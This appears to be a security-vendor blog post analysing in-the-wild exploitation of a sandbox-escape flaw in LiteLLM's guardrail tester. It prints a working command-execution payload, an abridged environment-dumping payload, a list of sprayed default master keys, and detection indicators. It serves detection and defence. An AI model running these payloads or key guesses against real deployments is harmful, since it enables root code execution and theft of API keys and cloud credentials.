Zenity Labs

Threat Actors Are Trying to use LiteLLM's Guardrail Tester to Run Code as Root

A closer look at custom-code guardrail sandbox-escape (CVE-2026-40217) activity in the wild

Between 2026-04-15 and 2026-05-24, our honeypot sensors recorded 569 POST requests to /guardrails/test_custom_code. Most guessed a proxy master key (effectively the admin key to the AI gateway), and each carried a Python payload, ranging from a {'probe':1} capability check to full sandbox-escape exploits.

The activity maps to CVE-2026-40217, a sandbox-escape RCE in LiteLLM's custom-code guardrail (affects 1.81.8 up to but not including 1.83.10; CVSS 8.8; disclosed 2026-04-10; fixed 2026-04-15 in 1.83.10). The official LiteLLM Docker image runs the proxy as root, so a successful sandbox escape yields root-level RCE. LiteLLM does ship a non-root image variant, which is exactly the hardening we recommend below. The first probes recorded by our sensors landed on 2026-04-15, the same day the fix shipped.
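To check whether a given deployment falls inside that range, a minimal sketch follows. The helper names (parse_version, is_affected) are hypothetical; the bounds are the ones stated above, and only the leading X.Y.Z is compared, so pre-release or build suffixes are ignored.

```python
import re

# Affected range as summarized above: 1.81.8 <= version < 1.83.10.
AFFECTED_FROM = (1, 81, 8)
FIXED_IN = (1, 83, 10)


def parse_version(version: str) -> tuple:
    """Return the first X.Y.Z found in a version string as a tuple of ints.

    Tolerates prefixes and suffixes such as "v" or "-stable".
    """
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(version: str) -> bool:
    """True if the version falls in the CVE-2026-40217 affected range."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_IN


if __name__ == "__main__":
    from importlib.metadata import PackageNotFoundError, version as installed_version

    try:
        v = installed_version("litellm")
        print(v, "AFFECTED" if is_affected(v) else "not in affected range")
    except PackageNotFoundError:
        print("litellm is not installed in this environment")
```

Run inside the proxy's Python environment, it reports the installed package version; for container deployments the image tag can be passed to is_affected directly.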

The guardrail tester as attack surface

A LiteLLM custom-code guardrail is a Python function that inspects traffic passing through the proxy and returns a verdict: allow, block or modify. Benign uses include PII redaction or blocking secrets in prompts. The /guardrails/test_custom_code endpoint lets a user try a guardrail against sample input before deploying it, and runs the code inside a hand-rolled sandbox. Every request we captured has this shape:

POST /guardrails/test_custom_code HTTP/1.1
Host: <litellm-host>:4000
Authorization: Bearer sk-1234
Content-Type: application/json

{
  "custom_code": "<Python code>",
  "test_input": {"messages": [{"role": "user", "content": "t"}]}
}
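Because captured bodies are JSON, the submitted Python can be pulled out before any further inspection. A minimal sketch, assuming bodies are logged as raw bytes; parse_guardrail_test_body is a hypothetical helper, and the field names are the ones in the request shape above.

```python
import json
from typing import Optional, Tuple


def parse_guardrail_test_body(raw: bytes) -> Optional[Tuple[str, dict]]:
    """Extract (custom_code, test_input) from a /guardrails/test_custom_code body.

    Returns None if the body is not JSON or lacks a string "custom_code" field.
    """
    try:
        body = json.loads(raw)
    except (json.JSONDecodeError, UnicodeDecodeError):
        return None
    if not isinstance(body, dict) or not isinstance(body.get("custom_code"), str):
        return None
    test_input = body.get("test_input")
    # Normalize a missing or malformed test_input to an empty dict.
    return body["custom_code"], (test_input if isinstance(test_input, dict) else {})
```

Returning None instead of raising keeps a log-triage loop simple: malformed bodies are skipped rather than crashing the scan.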

The sandbox escape: CVE-2026-40217

The sandbox is essentially a text deny-list: it scans the submitted source for forbidden words such as import, code and globals, and rejects any code that contains them. CVE-2026-40217 exploits two weaknesses in this design. First, the code runs through an exec() whose globals lack __builtins__, so Python re-injects the full builtins (__import__, open, eval). Second, the deny-list falls the moment an attacker stops writing the forbidden words literally and rebuilds them at runtime from string fragments (e.g., "_"+"_gl"+"ob"+"als"+"_"+"_" becomes "__globals__").
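Both weaknesses can be seen with a few lines of standard Python. This is an illustrative sketch only: FORBIDDEN_WORDS and denylist_allows are hypothetical simplifications, not LiteLLM's implementation, and the snippet merely builds a string; it does not escape anything.

```python
# Hypothetical, simplified keyword deny-list; NOT LiteLLM's actual code.
FORBIDDEN_WORDS = ("import", "code", "globals")


def denylist_allows(source: str) -> bool:
    """Reject source text that contains any forbidden word literally."""
    return not any(word in source for word in FORBIDDEN_WORDS)


literal = "name = '__globals__'"
fragmented = "name = '_' + '_gl' + 'ob' + 'als' + '_' + '_'"

print(denylist_allows(literal))     # False: the literal word is caught
print(denylist_allows(fragmented))  # True: no forbidden word appears in the text

# At runtime the fragments evaluate to the forbidden name anyway.
scope = {}
exec(fragmented, scope)
print(scope["name"])                # __globals__

# exec() inserts __builtins__ when the globals dict lacks it (documented behavior).
print("__builtins__" in scope)      # True
```

Passing {"__builtins__": {}} as globals would stop the automatic injection, but that alone is not a sandbox either: object introspection can still lead back to the real builtins, which is what the generator trick described next does.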

From there it abuses a quirk of Python's object model: a generator or coroutine object exposes internal attributes (gi_code, cr_frame) that still hold references to the surrounding scope. By creating a dummy generator just to read those attributes, the payload climbs from a harmless object back to Python's real builtins and its import function, and then simply imports os.

Design pattern exposure

Four design choices combine to create this vulnerability:

  • The endpoint executes user-supplied Python on the server.

  • Its sandbox is a keyword deny-list, which string concatenation trivially evades.

  • The default Docker image runs as root, so an escape becomes root RCE.

  • The attacker first needs a valid master key, which is why the activity we’ve seen pairs the exploit with a spray of guessable default keys (for example, LiteLLM’s default sk-1234 master key value).

Suspicious activity breakdown

The activity that targeted our sensors had a few elements stapled together.

The requests carried 47 distinct guessed Authorization: Bearer sk-... values (plus 64 requests with empty Authorization headers), all LiteLLM-themed defaults such as sk-1234, sk-litellm-master-key, sk-admin, and sk-changeme. Why try defaults at all? Because some deployments leave the master key at a documented default: sk-1234 is LiteLLM's own example key (it appears in the virtual-keys docs and ships in .env.example), so an install that kept it authenticates with a value the attacker already knows. The spray pattern across our LiteLLM sensors reads as a hunt for default-key deployments wherever they exist.
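Spotting this spray in proxy logs comes down to grouping bearer values by source. A minimal sketch, assuming your logs yield (source IP, Authorization header) pairs; find_key_sprayers, bearer_token and the min_distinct=3 threshold are hypothetical choices, and the default-key set is just the values named above.

```python
from collections import defaultdict

# Guessed values named above; extend with your own list of known defaults.
KNOWN_DEFAULT_KEYS = {"sk-1234", "sk-litellm-master-key", "sk-admin", "sk-changeme"}


def bearer_token(auth_header):
    """Return the token from 'Bearer <token>', or '' for an empty/other header."""
    if not auth_header:
        return ""
    scheme, _, token = auth_header.strip().partition(" ")
    return token.strip() if scheme.lower() == "bearer" else ""


def find_key_sprayers(requests, min_distinct=3):
    """Flag source IPs that cycle several bearer values or try a known default.

    `requests` is an iterable of (source_ip, authorization_header) pairs.
    """
    tokens_by_ip = defaultdict(set)
    for ip, auth in requests:
        tokens_by_ip[ip].add(bearer_token(auth))
    flagged = {}
    for ip, tokens in tokens_by_ip.items():
        distinct = tokens - {""}  # empty headers are probes, not guesses
        if len(distinct) >= min_distinct or distinct & KNOWN_DEFAULT_KEYS:
            flagged[ip] = sorted(distinct)
    return flagged
```

A single hit on a known default is treated as enough to flag, since legitimate clients should never present one.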

Recon came first, exploitation later. The volume arrived up front: 520 identical def apply_guardrail(i,r,t): return {'probe':1} requests on 2026-04-15, a go/no-go check. A 200 that echoes the return value answers two questions in one shot: is my key valid, and does this endpoint actually run the Python I send and hand me back its result?
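Since the probe's value lies entirely in the response, the defender's question is whether any of these requests were answered. A minimal sketch, assuming your logs retain status codes and response bodies; probe_succeeded is a hypothetical helper, and the expected body is the {"success":true, "result":{"probe":1}} shape from the lab verification later in this post.

```python
import json


def probe_succeeded(status_code: int, response_body: str) -> bool:
    """True if a logged response shows the {'probe': 1} check was executed and echoed.

    Assumes the response shape seen in our lab: {"success": true, "result": {...}}.
    """
    if status_code != 200:
        return False
    try:
        body = json.loads(response_body)
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        return False
    return (
        isinstance(body, dict)
        and body.get("success") is True
        and body.get("result") == {"probe": 1}
    )
```

A single True here means the guessed key worked and the endpoint ran attacker-supplied code, so it warrants incident response rather than just blocking.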

Then, across May, the real payloads arrived from different IPs:

The os.environ exfiltration payload

This payload aims to read the proxy's environment variables, where LiteLLM stores its provider and master API keys. It uses the sandbox escape described above to reach __import__, imports os, and serializes the environment into the response, going after variables whose names contain key, secret, api, aws, openai, anthropic, and master.

The payload, abridged:

gn = "_"+"_gl"+"ob"+"als"+"_"+"_"        # "__globals__", never written literally
# ... swap a throwaway generator's gi_code / co_names, walk back to the real import ...
return {"env": json.dumps(dict(os.environ))}   # every provider / master / AWS key

We also witnessed a simpler variant which skips the obfuscation and just filters os.environ for secret-named keys (key, secret, token, api, aws, openai, anthropic, master, database); because it writes import os literally, the deny-list catches it.
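The name filters in both variants double as a checklist for defenders: which variables in your proxy's environment would they have swept up? A minimal sketch; exposed_variable_names is hypothetical, it lists names only (never values), and because the full-dump payload takes everything anyway, treat the output as a rotation priority list rather than the full exposure.

```python
import os

# Substrings the payloads used to pick out secrets (union of both variants above).
SECRET_MARKERS = ("key", "secret", "token", "api", "aws", "openai", "anthropic",
                  "master", "database")


def exposed_variable_names(environ=None):
    """List environment variable NAMES (never values) matching the payloads' filters."""
    environ = os.environ if environ is None else environ
    return sorted(
        name for name in environ
        if any(marker in name.lower() for marker in SECRET_MARKERS)
    )


if __name__ == "__main__":
    # Run inside the proxy container to see what a successful dump would expose.
    for name in exposed_variable_names():
        print(name)
```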

Command execution

This variant launches the command with subprocess.Popen(..., shell=True) and returns without waiting for it, so the process keeps running after the response is sent. A Chinese comment in the payload notes that this dodges the endpoint's roughly 5-second timeout:

def apply_guardrail(inputs, request_data, input_type):
   coro = http_request("http://127.0.0.1")
   imp = coro.cr_frame.f_builtins["__import__"]
   sp = imp("subprocess")
   cmd = inputs["texts"][0] if inputs.get("texts") else "id"
   sp.Popen(cmd, shell=True)   # (translated from Chinese) don't wait for the process to finish; dodges the 5s limit
   coro.close()
   return block("executed in background")

Another variant had the simplest form, import os; x=os.popen('id').read(), which the deny-list catches; the introspection payloads are how the others get around it.

Verifying the attack

To confirm these are working exploits caught in the wild and not just suspicious-looking code, we reproduced the attacks in a lab. We replayed the captured payloads against a vulnerable LiteLLM build (1.83.0, in the affected 1.81.8–1.83.9 range) configured with a master key and with a planted secret, SECRET_CANARY=CANARY_LEAKED_OK_777, in the proxy's environment. A plain probe:1 returned {"success":true, "result":{"probe":1}}, confirming that the endpoint runs submitted code, while a literal import os was still blocked by the deny-list ("Security violation: import statements are not allowed"). The probe is the same one seen in the recon traffic described in the suspicious activity breakdown above.

We then replayed the two captured escape payloads, and both sailed straight through LiteLLM's sandbox. The string-fragment env-dump payload returned the proxy's full environment, including our planted CANARY_LEAKED_OK_777 secret, and the subprocess.Popen payload (shown above in the suspicious activity breakdown) executed its command. This confirms the captured payloads as working CVE-2026-40217 exploits: the deny-list stops the obvious keywords, but the payloads rebuild them at runtime, escape the sandbox, and between them read secrets and run commands.
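A replay harness mostly needs to sort responses into the outcomes described above. A minimal sketch, assuming the response body is available as text; classify_replay and its labels are hypothetical, the blocked marker is the start of the deny-list message we observed, and because the exact JSON envelope of that error is not shown here, it matches on text.

```python
import json

BLOCKED_MARKER = "Security violation"  # start of the deny-list message seen in the lab


def classify_replay(response_text: str, canary: str) -> str:
    """Label a lab replay response as 'leaked', 'blocked', 'executed' or 'other'."""
    # Check the canary first: a dumped environment comes back inside an
    # otherwise ordinary successful response.
    if canary in response_text:
        return "leaked"
    if BLOCKED_MARKER in response_text:
        return "blocked"
    try:
        body = json.loads(response_text)
    except ValueError:
        return "other"
    if isinstance(body, dict) and body.get("success") is True:
        return "executed"
    return "other"
```

Using a unique, meaningless canary value means a match can only come from the planted secret, never from coincidental response text.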

Assessment

By their shape, these are CVE-2026-40217 exploitation attempts rather than generic scanning: every request hits the CVE's exact endpoint with LiteLLM's apply_guardrail() signature, and the escape payloads perform the specific deny-list bypass the advisory describes. The activity splits into high-volume capability probing (probe:1, from 173.249.198.201 and 108.78.4.10) and lower-volume, hand-crafted exploitation (the os.environ and command-execution escapes). Six of the eight source IPs also appear in our LiteLLM control-plane findings, with several hitting the guardrail endpoint, /config/update, and the api_base SSRF on the same day. 

Running the source IPs through VirusTotal tells us more about who we're dealing with: the hands-on exploit senders are already flagged as malicious.
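The cross-endpoint overlap noted above can be reproduced on your own logs by grouping control-plane hits per source and day. A minimal sketch, assuming events carry ISO 8601 timestamps in a single time zone; multi_endpoint_sources and the two-path threshold are hypothetical, and the api_base SSRF is omitted because this post does not name its request path.

```python
from collections import defaultdict

# Control-plane paths named in this post. The api_base SSRF is omitted because
# its request path is not given here.
CONTROL_PLANE_PATHS = {"/guardrails/test_custom_code", "/config/update"}


def multi_endpoint_sources(events, min_paths=2):
    """Map (source_ip, day) to the control-plane paths it hit, if it hit several.

    `events` is an iterable of (source_ip, iso8601_timestamp, path) tuples.
    """
    hits = defaultdict(set)
    for ip, timestamp, path in events:
        path = path.split("?", 1)[0]              # ignore any query string
        if path in CONTROL_PLANE_PATHS:
            hits[(ip, timestamp[:10])].add(path)  # "YYYY-MM-DD" prefix = day
    return {key: sorted(paths) for key, paths in hits.items()
            if len(paths) >= min_paths}
```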

What to block

Abused endpoints

This is a low-traffic admin endpoint that should never see internet traffic. Alert on any external POST to it:

  • /guardrails/test_custom_code
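As a detection rule, that alert is a few lines over parsed access-log fields. A minimal sketch, assuming method, path and source IP are already extracted; alert_level and its severity labels are hypothetical, "external" is approximated with Python's ipaddress is_global, and the IP set is the list given under IP addresses in this post.

```python
import ipaddress
from typing import Optional

WATCHED_PATH = "/guardrails/test_custom_code"
# Source IPs listed under "IP addresses" in this post.
KNOWN_BAD_IPS = {"173.249.198.201", "108.78.4.10", "216.26.226.182",
                 "125.81.162.148", "5.34.179.24", "164.52.192.134"}


def alert_level(method: str, path: str, source_ip: str) -> Optional[str]:
    """Return None, 'alert' or 'critical' for one request (raises ValueError on a bad IP)."""
    if method.upper() != "POST" or path.split("?", 1)[0] != WATCHED_PATH:
        return None
    ip = ipaddress.ip_address(source_ip)
    if not ip.is_global:
        return None  # internal traffic: handle with your own policy, not this rule
    return "critical" if str(ip) in KNOWN_BAD_IPS else "alert"
```

Every external POST alerts; a known source only raises the severity, because new infrastructure will not be on any static list.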

Request-body payloads

Custom-guardrail code that does anything beyond returning a verdict is suspicious. Watch for:

  • Capability probe: a guardrail that just returns a marker like {'probe':1}.

  • Sandbox-escape tells: string-fragment dunder reconstruction ("_"+"_gl"+"ob"+…), generator/coroutine internals (e.g., gi_code, cr_frame, f_builtins), dict(os.environ), or subprocess.Popen(..., shell=True).

  • Master-key spray: repeated requests cycling documented/guessable sk-… bearer values (sk-1234, sk-litellm-master-key, sk-admin, sk-changeme, etc.).
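The payload indicators above translate into pattern checks on the custom_code field. A minimal sketch with hypothetical names (INDICATORS, match_indicators); the regexes are our own heuristics built from the payloads in this post, not a LiteLLM or vendor signature set, and further-obfuscated variants will evade them. Master-key spray is a property of many requests rather than one body, so it is left to log aggregation.

```python
import re

# Heuristic indicators drawn from the payloads described in this post. They will
# miss variants and may flag unusual benign code; treat hits as triage signals.
INDICATORS = {
    "capability_probe": re.compile(r"""['"]probe['"]\s*:\s*1\b"""),
    "string_fragment_dunder": re.compile(r"""['"]_['"]\s*\+\s*['"]_"""),
    "frame_introspection": re.compile(
        r"\b(?:gi_code|gi_frame|cr_code|cr_frame|f_builtins|f_globals)\b"),
    "env_dump": re.compile(r"\bdict\(\s*os\.environ\s*\)"),
    "shell_popen": re.compile(r"\bPopen\s*\([^)]*\bshell\s*=\s*True"),
}


def match_indicators(custom_code: str) -> list:
    """Return the names of all indicators found in submitted guardrail code."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(custom_code)]
```

The shell_popen pattern matches on Popen rather than subprocess.Popen because the captured payload calls it through an alias (sp.Popen) obtained via __import__.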

IP addresses

  • 173.249.198.201

  • 108.78.4.10

  • 216.26.226.182

  • 125.81.162.148

  • 5.34.179.24

  • 164.52.192.134

Recommendations

  • Upgrade to LiteLLM 1.83.10 or later, which replaces the deny-list with a real RestrictedPython sandbox.

  • Rotate the master key away from any default or guessable value to a long random one.

  • Keep the control plane off the public internet, and run the proxy as a non-root user (override the default Docker user) to blunt a successful escape.
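The key and non-root recommendations can be spot-checked from inside the proxy container. A minimal sketch: master_key_problems, running_as_root and the 32-character threshold are hypothetical, and reading the key from a LITELLM_MASTER_KEY environment variable is an assumption about how your deployment supplies it.

```python
import os

# Values seen in the spray above; any of these, or a short key, should be rotated.
KNOWN_DEFAULT_KEYS = {"sk-1234", "sk-litellm-master-key", "sk-admin", "sk-changeme"}
MIN_KEY_LENGTH = 32  # hypothetical threshold: pick your own policy


def master_key_problems(key):
    """Return a list of reasons the master key looks guessable (empty if none)."""
    if not key:
        return ["no master key set"]
    problems = []
    if key in KNOWN_DEFAULT_KEYS:
        problems.append("matches a documented/sprayed default")
    if len(key) < MIN_KEY_LENGTH:
        problems.append(f"shorter than {MIN_KEY_LENGTH} characters")
    return problems


def running_as_root():
    """True if this process has effective UID 0 (POSIX only; False elsewhere)."""
    return hasattr(os, "geteuid") and os.geteuid() == 0


if __name__ == "__main__":
    # Assumption: the key is supplied via the LITELLM_MASTER_KEY environment variable.
    for problem in master_key_problems(os.environ.get("LITELLM_MASTER_KEY")):
        print("master key:", problem)
    if running_as_root():
        print("process is running as root")
```

A replacement value can come from Python's secrets module, for example "sk-" + secrets.token_urlsafe(32), keeping the sk- prefix used throughout this post.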

Why it matters

  • CVE-2026-40217 is a sandbox-escape remote-code-execution flaw in LiteLLM's custom-code guardrail. We are seeing it exploited in the wild within five days of its disclosure, with hundreds of requests spanning reconnaissance, sandbox-escape techniques, and full operating-system command execution.

    The impact is concrete: a valid master key, as defined above, only gets you into the proxy's gateway. CVE-2026-40217 is what turns that limited access into full control of the server underneath: the escape runs commands on the host and reads the proxy's entire environment, exposing whatever secrets it holds, such as raw provider API keys (usable directly, off-platform), cloud credentials, or the database connection string.
